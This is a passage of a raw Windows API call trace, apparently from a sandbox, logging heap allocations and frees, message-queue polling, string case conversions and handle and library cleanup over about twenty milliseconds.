lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.622] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.622] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.622] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.622] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.623] CryptReleaseContext (hProv=0xad6260, dwFlags=0x0) returned 1 [0199.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0199.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0199.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0199.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.626] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0199.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0199.626] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0199.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0199.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.627] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.627] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0199.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.628] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.628] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.629] FreeLibrary (hLibModule=0x74d40000) returned 1 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.629] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.630] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0199.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.630] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0199.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0199.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0199.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0199.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0199.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0199.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0199.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.631] CloseHandle (hObject=0x2c0) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0199.632] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0199.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0199.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0199.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0199.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0199.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0199.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.634] CloseHandle (hObject=0x2ac) returned 1 [0199.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0199.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0199.641] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0199.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 